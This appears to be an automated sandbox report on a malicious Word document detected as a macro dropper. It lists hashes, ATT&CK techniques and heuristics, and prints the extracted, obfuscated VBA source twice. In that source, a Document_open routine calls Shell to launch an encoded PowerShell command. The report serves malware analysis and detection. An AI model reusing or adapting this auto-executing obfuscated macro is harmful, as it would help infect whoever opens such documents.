Office (OLE) malware analysis — malicious · 4e6f8de2720bf7ea

MALICIOUS

Office (OLE)

95.2 KB Created: 2018-06-15 14:50:00 Authoring application: Microsoft Office Word First seen: 2018-11-13

MD5: a32d11da5101c205635c01cffd09dad7 SHA-1: b53e99cad6c526e5bd84b8b30e44fba0bae3ac45 SHA-256: 4e6f8de2720bf7eac053b86eb0f68496eab21d97075bcde468df387f9abf9310

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA code, and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' confirms this is triggered by the Document_open auto-execution macro. This functionality is typical of a dropper malware designed to download and execute a second-stage payload.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6599226-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6599226-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13985 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13985 bytes
SHA-256: `1e979aeaf713b96301d00f4e4aa3cd27ed0047bb86884eb4eb3f8c23dbd963ae`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ZiGLvWCjQH" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function vaWbZmwj() On Error Resume Next WzjnJ = 79387 + DYRiL + (21438 * CDbl(pnQajb) - WApwH / CSng(84612) - KiSjZM / Hex(rqfPK) + 84287 - 66356) jihZio = TOXip wzwOzA = tpBzQs - wzlwpz / 92980 / KVjlNk - 223327908 + Hex(joCJdf) * iLMJt - Round(94583) QDOTp = Sqr(52816) mciNn = 27696 + FNuGO + (27184 * CDbl(PZmfEz) - zIIwwS / CSng(63480) - UCftS / Hex(FhwWiq) + 70028 - 199) NNbpOR = dUAdk UZkSoU = Rowaz - raUvtK / 85292 / IaJKzp - 223327908 + Hex(VwdrCm) * GJAukK - Round(62890) VaAop = Sqr(6937) zbIqf = 68085 + qSiwGK + (39202 * CDbl(vwZhH) - rtZqOs / CSng(29634) - jMrsVH / Hex(sEFbkr) + 31369 - 64122) iPlHbu = FufLu nlHijA = qhziW - NoNiC / 90292 / FXibL - 223327908 + Hex(pzSVjn) * NFjzw - Round(17609) ARZtKv = Sqr(11108) AmYPD = 62694 + wLTYL + (26971 * CDbl(PqIENf) - riVUnt / CSng(1463) - CUFGcn / Hex(ppjSb) + 19885 - 85224) okCuh = kncMP XzjNJH = vPmWw - zSFlI / 91062 / TYuEj - 223327908 + Hex(KIdGHF) * XzGWO - Round(57616) Mqjmv = Sqr(87445) vaWbZmwj = LPFlOIKPiio + VBA.Shell(LmvdHwl + Chr(VwAbVnAGDhU + vbKeyP + wCakjzjTzz) + "owers" + kmDpthBKo + DEPERjIhdLL + nJHJjKb + ofuNNj, 86352 - 86352) zsLwEf = 57295 + zuSIf + (31906 * CDbl(kCLiXi) - OZIOwY / CSng(30101) - NsMdFO / Hex(wBrlT) + 31048 - 84765) mtQjF = jVulu XzRdm = qjFuIj - wBKiYD / 18505 / mKRWzB - 223327908 + Hex(JFRUf) * odnkaI - Round(22820) HApSwT = Sqr(66951) KlpzH = 77777 + cXAdoB + (70225 * CDbl(XXuwv) - jGkKKw / CSng(82298) - fQrEF / Hex(ConclS) + 67785 - 75068) fZHLB = zioZQ bUbiiE = wswOsj - jvFFjj / 34571 / cOtco - 223327908 + Hex(BfpmYW) * kiAYj - Round(97479) wTJQBb = Sqr(13369) End Function Private Sub Document_open() On Error Resume Next sMkCQ = 96260 + MJcUMW + (98828 * CDbl(EhAkm) - Htzhd / CSng(14097) - UttAuA / Hex(RQVSAk) + 64200 - 21901) tUUuuK = OLvsXc npwkTl = mqIrQ - TSWHzo / 22058 / jClwBY - 223327908 + Hex(qWpOiB) * FDHwf - Round(1586) ahnkzG = Sqr(27972) DnLnR = 23440 + wTTdl + (63492 * CDbl(NSzAJ) - CZbvB / CSng(84899) - jZtrw / Hex(rJRsUh) + 36981 - 59558) JbpvJG = RdzRD dwIsId = PmZtm - abjKp / 93275 / afTpfS - 223327908 + Hex(TjrPSh) * Qvojjj - Round(10016) qHMJcA = Sqr(4865) vaWbZmwj cSMpts = 61187 + JbFzKj + (84453 * CDbl(GPqwzL) - nGUnD / CSng(84436) - OaBRSV / Hex(tnMzm) + 96712 - 95535) hHZsLP = fzmDGY bAQBZ = ZFbCjM - vsOVEN / 54583 / zKNSzs - 223327908 + Hex(nQTwa) * aRBUw - Round(21083) OFznYj = Sqr(76482) LmbpD = 67510 + qKSLjk + (73272 * CDbl(VbMBI) - OXiaw / CSng(65755) - YBBwzd / Hex(Xwbzk) + 43272 - 39368) GVjRk = TNlRT mZPLRz = zPHAi - JRNkG / 43454 / XzORlh - 223327908 + Hex(kUaOj) * aOcin - Round(23778) nJAhw = Sqr(74778) End Sub Attribute VB_Name = "JAMqjnCuV" Function kmDpthBKo() On Error Resume Next EwJiDi = jiWEU ihuaZQ = Sqr(68091) VNLbt = qszEK - iHuzjE / 10497 / dkiVMY - 223327908 + Hex(WlLkS) * EzHDzj - Round(94383) EvZlO = 88831 + CaQOI + (58213 * CDbl(RTIIs) - IsEjmK / CSng(68597) - UTVOZ / Hex(IVpYd) + 43722 - 62122) WZYihiAhi = "HeLL .( $ENv:c" + "oMspec" + "[4,26,25]-jOIn'" + "') ( " + Chr(34) + "$( SeT-" + "iteM '" + "VaRIaBLE:ofs'" + " '') " + Chr(34) + " + [sTRiN" + "g]('54m113g71T9" zYZMiB = nurVL kFUYXO = Sqr(861) FwDUGY = jlzGlP - EkIMw / 27963 / ENIIpb - 223327908 + Hex(pFzcit) * TEjKo - Round(88373) mkjqPU = 94270 + GoTrJ + (57865 * CDbl(mwlYI) - jMEJd / CSng(44003) - jrTPHB / Hex(NYNhL) + 119 - 18595) iOkGj = "0}101}126a11" + "3Z50}47U50<1" + "24U119a1" + "01U63<125" + "Z112Z120m1" + "19<113{102" + "m5" + "0Z96}115<124g11" + "8a125b" + "127b41g54" vNtYaQ = jQLSl OQVDJ = Sqr(29530) oIKRL = ijcBlj - rKTGru / 2832 / HIQFN - 223327908 + Hex(lzOLCj) * BfzfT - Round(37938) BiuMR = 93976 + rjwdCW + (12634 * CDbl(jbCHUD) - AOkPL / CSng(97172) - poKwi / Hex(kJUtr) + 28887 - 79154) JBPNnSBLhv = "T123g84m121Z118" + "}68b118a50T4" + "7}50" + "a124Z1" + " ... (truncated)

SHA-256: 1e979aeaf713b96301d00f4e4aa3cd27ed0047bb86884eb4eb3f8c23dbd963ae

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ZiGLvWCjQH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function vaWbZmwj()
On Error Resume Next
WzjnJ = 79387 + DYRiL + (21438 * CDbl(pnQajb) - WApwH / CSng(84612) - KiSjZM / Hex(rqfPK) + 84287 - 66356)
jihZio = TOXip
wzwOzA = tpBzQs - wzlwpz / 92980 / KVjlNk - 223327908 + Hex(joCJdf) * iLMJt - Round(94583)
QDOTp = Sqr(52816)
mciNn = 27696 + FNuGO + (27184 * CDbl(PZmfEz) - zIIwwS / CSng(63480) - UCftS / Hex(FhwWiq) + 70028 - 199)
NNbpOR = dUAdk
UZkSoU = Rowaz - raUvtK / 85292 / IaJKzp - 223327908 + Hex(VwdrCm) * GJAukK - Round(62890)
VaAop = Sqr(6937)
zbIqf = 68085 + qSiwGK + (39202 * CDbl(vwZhH) - rtZqOs / CSng(29634) - jMrsVH / Hex(sEFbkr) + 31369 - 64122)
iPlHbu = FufLu
nlHijA = qhziW - NoNiC / 90292 / FXibL - 223327908 + Hex(pzSVjn) * NFjzw - Round(17609)
ARZtKv = Sqr(11108)
AmYPD = 62694 + wLTYL + (26971 * CDbl(PqIENf) - riVUnt / CSng(1463) - CUFGcn / Hex(ppjSb) + 19885 - 85224)
okCuh = kncMP
XzjNJH = vPmWw - zSFlI / 91062 / TYuEj - 223327908 + Hex(KIdGHF) * XzGWO - Round(57616)
Mqjmv = Sqr(87445)
vaWbZmwj = LPFlOIKPiio + VBA.Shell(LmvdHwl + Chr(VwAbVnAGDhU + vbKeyP + wCakjzjTzz) + "owers" + kmDpthBKo + DEPERjIhdLL + nJHJjKb + ofuNNj, 86352 - 86352)
zsLwEf = 57295 + zuSIf + (31906 * CDbl(kCLiXi) - OZIOwY / CSng(30101) - NsMdFO / Hex(wBrlT) + 31048 - 84765)
mtQjF = jVulu
XzRdm = qjFuIj - wBKiYD / 18505 / mKRWzB - 223327908 + Hex(JFRUf) * odnkaI - Round(22820)
HApSwT = Sqr(66951)
KlpzH = 77777 + cXAdoB + (70225 * CDbl(XXuwv) - jGkKKw / CSng(82298) - fQrEF / Hex(ConclS) + 67785 - 75068)
fZHLB = zioZQ
bUbiiE = wswOsj - jvFFjj / 34571 / cOtco - 223327908 + Hex(BfpmYW) * kiAYj - Round(97479)
wTJQBb = Sqr(13369)
End Function
Private Sub Document_open()
On Error Resume Next
sMkCQ = 96260 + MJcUMW + (98828 * CDbl(EhAkm) - Htzhd / CSng(14097) - UttAuA / Hex(RQVSAk) + 64200 - 21901)
tUUuuK = OLvsXc
npwkTl = mqIrQ - TSWHzo / 22058 / jClwBY - 223327908 + Hex(qWpOiB) * FDHwf - Round(1586)
ahnkzG = Sqr(27972)
DnLnR = 23440 + wTTdl + (63492 * CDbl(NSzAJ) - CZbvB / CSng(84899) - jZtrw / Hex(rJRsUh) + 36981 - 59558)
JbpvJG = RdzRD
dwIsId = PmZtm - abjKp / 93275 / afTpfS - 223327908 + Hex(TjrPSh) * Qvojjj - Round(10016)
qHMJcA = Sqr(4865)
vaWbZmwj
cSMpts = 61187 + JbFzKj + (84453 * CDbl(GPqwzL) - nGUnD / CSng(84436) - OaBRSV / Hex(tnMzm) + 96712 - 95535)
hHZsLP = fzmDGY
bAQBZ = ZFbCjM - vsOVEN / 54583 / zKNSzs - 223327908 + Hex(nQTwa) * aRBUw - Round(21083)
OFznYj = Sqr(76482)
LmbpD = 67510 + qKSLjk + (73272 * CDbl(VbMBI) - OXiaw / CSng(65755) - YBBwzd / Hex(Xwbzk) + 43272 - 39368)
GVjRk = TNlRT
mZPLRz = zPHAi - JRNkG / 43454 / XzORlh - 223327908 + Hex(kUaOj) * aOcin - Round(23778)
nJAhw = Sqr(74778)
End Sub


Attribute VB_Name = "JAMqjnCuV"
Function kmDpthBKo()
On Error Resume Next
EwJiDi = jiWEU
ihuaZQ = Sqr(68091)
VNLbt = qszEK - iHuzjE / 10497 / dkiVMY - 223327908 + Hex(WlLkS) * EzHDzj - Round(94383)
EvZlO = 88831 + CaQOI + (58213 * CDbl(RTIIs) - IsEjmK / CSng(68597) - UTVOZ / Hex(IVpYd) + 43722 - 62122)
WZYihiAhi = "HeLL  .( $ENv:c" + "oMspec" + "[4,26,25]-jOIn'" + "') ( " + Chr(34) + "$( SeT-" + "iteM  '" + "VaRIaBLE:ofs'" + " '') " + Chr(34) + " + [sTRiN" + "g]('54m113g71T9"
zYZMiB = nurVL
kFUYXO = Sqr(861)
FwDUGY = jlzGlP - EkIMw / 27963 / ENIIpb - 223327908 + Hex(pFzcit) * TEjKo - Round(88373)
mkjqPU = 94270 + GoTrJ + (57865 * CDbl(mwlYI) - jMEJd / CSng(44003) - jrTPHB / Hex(NYNhL) + 119 - 18595)
iOkGj = "0}101}126a11" + "3Z50}47U50<1" + "24U119a1" + "01U63<125" + "Z112Z120m1" + "19<113{102" + "m5" + "0Z96}115<124g11" + "8a125b" + "127b41g54"
vNtYaQ = jQLSl
OQVDJ = Sqr(29530)
oIKRL = ijcBlj - rKTGru / 2832 / HIQFN - 223327908 + Hex(lzOLCj) * BfzfT - Round(37938)
BiuMR = 93976 + rjwdCW + (12634 * CDbl(jbCHUD) - AOkPL / CSng(97172) - poKwi / Hex(kJUtr) + 28887 - 79154)
JBPNnSBLhv = "T123g84m121Z118" + "}68b118a50T4" + "7}50" + "a124Z1" + "
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.